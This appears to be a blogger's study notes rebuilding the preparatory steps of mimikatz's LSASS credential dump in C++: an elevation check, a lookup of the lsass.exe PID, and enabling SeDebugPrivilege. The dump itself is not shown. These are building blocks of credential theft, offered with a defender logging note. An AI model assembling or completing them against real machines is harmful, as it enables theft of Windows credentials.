mimikatz’s lsass dumper

my first English page

access tokens

https://learn.microsoft.com/en-us/windows/win32/secauthz/access-tokens

Handles and objects 

https://learn.microsoft.com/en-us/windows/win32/sysinfo/handles-and-objects

OpenProcessToken function

https://learn.microsoft.com/en-us/windows/win32/api/processthreadsapi/nf-processthreadsapi-openprocesstoken

Access Rights for Access-Token Objects

https://learn.microsoft.com/en-us/windows/win32/secauthz/access-rights-for-access-token-objects

Function one: confirm whether the current process has administrator rights (i.e. runs with an elevated token)



#include <iostream>
#include "Windows.h"
using namespace std;

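/// Reports whether the current process runs with an elevated (full
/// administrator) token rather than a UAC-filtered one.
/// Queries the TokenElevation class of the process token.
/// @return true only when the token is opened, the query succeeds and
///         TokenIsElevated is non-zero; false on every failure path.
bool isElevatedProcess() {
    // Both locals were previously uninitialised: on an OpenProcessToken
    // failure the function read an indeterminate handle and returned an
    // indeterminate bool. Defaulting to "not elevated" makes failure safe.
    bool isElevated = false;
    HANDLE access_token = NULL;
    if (OpenProcessToken(GetCurrentProcess(), TOKEN_QUERY, &access_token)) {
        TOKEN_ELEVATION elevation = {};
        DWORD returned_size = sizeof(elevation);
        if (GetTokenInformation(access_token, TokenElevation, &elevation, sizeof(elevation), &returned_size)) {
            isElevated = (elevation.TokenIsElevated != 0);
        }
    }
    if (access_token) {
        CloseHandle(access_token);   // token handles are kernel objects; release them
    }
    return isElevated;
}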


/// Entry point: prints "admin" when the process token is elevated and
/// "no" otherwise, then waits for a keypress so the console stays open.
int main()
{
    const char* verdict = isElevatedProcess() ? "admin" : "no";
    printf("%s", verdict);
    getchar();
}

Function two: get a process PID by its image name

CreateToolhelp32Snapshot

https://learn.microsoft.com/zh-cn/windows/win32/api/tlhelp32/nf-tlhelp32-createtoolhelp32snapshot

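/// Finds the PID of the first running process whose image name equals
/// processName, using a Toolhelp32 process snapshot.
/// @param processName image name to match (exact, case-sensitive wstring
///        comparison, e.g. L"lsass.exe").
/// @return the matching th32ProcessID, or 0 when no process matches or the
///         snapshot cannot be created. The original returned an
///         uninitialised DWORD in both of those cases.
DWORD GetProcessIDByName(const wstring& processName) {
    DWORD ProcessID = 0;   // 0 doubles as the "not found" value
    HANDLE snapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
    if (snapshot == INVALID_HANDLE_VALUE) {
        return ProcessID;
    }
    PROCESSENTRY32 processEntry = {};
    processEntry.dwSize = sizeof(processEntry);   // Process32First requires dwSize to be set
    if (Process32First(snapshot, &processEntry)) {
        do {
            // wstring == wchar_t* compares contents, no temporary needed
            if (processName == processEntry.szExeFile) {
                ProcessID = processEntry.th32ProcessID;
                break;
            }
        } while (Process32Next(snapshot, &processEntry));
    }
    CloseHandle(snapshot);
    return ProcessID;
}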
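    // Usage example: look up lsass.exe and print its PID.
    // DWORD is unsigned long on Windows, so %lu is the matching conversion;
    // the original %d was a signed/unsigned format mismatch. A printed PID of
    // 0 means GetProcessIDByName found no match (or failed).
    wstring ProcessName = L"lsass.exe";
    DWORD processPID = GetProcessIDByName(ProcessName);
    printf("lsass.exe PID:%lu", processPID);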

Function three: get the lsass dump (the listing below only enables SeDebugPrivilege; the dump call itself is not shown)

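/// Enables SeDebugPrivilege on the current process token.
/// @return true only when the privilege is actually enabled afterwards;
///         false if the token cannot be opened, the privilege name cannot be
///         resolved, AdjustTokenPrivileges fails, or the token does not hold
///         the privilege at all (the ERROR_NOT_ALL_ASSIGNED case, which the
///         original treated as success). Administrators hold the privilege
///         by default, so an elevated process is normally required.
/// Defender note: with the "Audit Token Right Adjusted" policy enabled this
/// adjustment is recorded as Security event 4703.
bool setPrivilege() {
    HANDLE tokenPriv = NULL;
    // OpenProcessToken returns non-zero on success; the original tested the
    // success value and bailed out precisely when the token HAD been opened.
    if (!OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES, &tokenPriv)) {
        return false;
    }
    bool status = false;
    LUID luid = {};
    // Use the wide literal directly; the byte-wise string->wstring copy in
    // the original was redundant for an ASCII name.
    if (LookupPrivilegeValueW(NULL, L"SeDebugPrivilege", &luid)) {
        TOKEN_PRIVILEGES priv = {};
        priv.PrivilegeCount = 1;
        priv.Privileges[0].Luid = luid;
        priv.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
        // AdjustTokenPrivileges returns TRUE even when it enabled nothing;
        // the real outcome is GetLastError(): ERROR_SUCCESS vs ERROR_NOT_ALL_ASSIGNED.
        if (AdjustTokenPrivileges(tokenPriv, FALSE, &priv, 0, NULL, NULL)) {
            status = (GetLastError() == ERROR_SUCCESS);
        }
    }
    // Single exit: the original fell off the end without a return value
    // whenever tokenPriv was NULL, which is undefined behaviour.
    CloseHandle(tokenPriv);
    return status;
}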

What is a handle in C++?
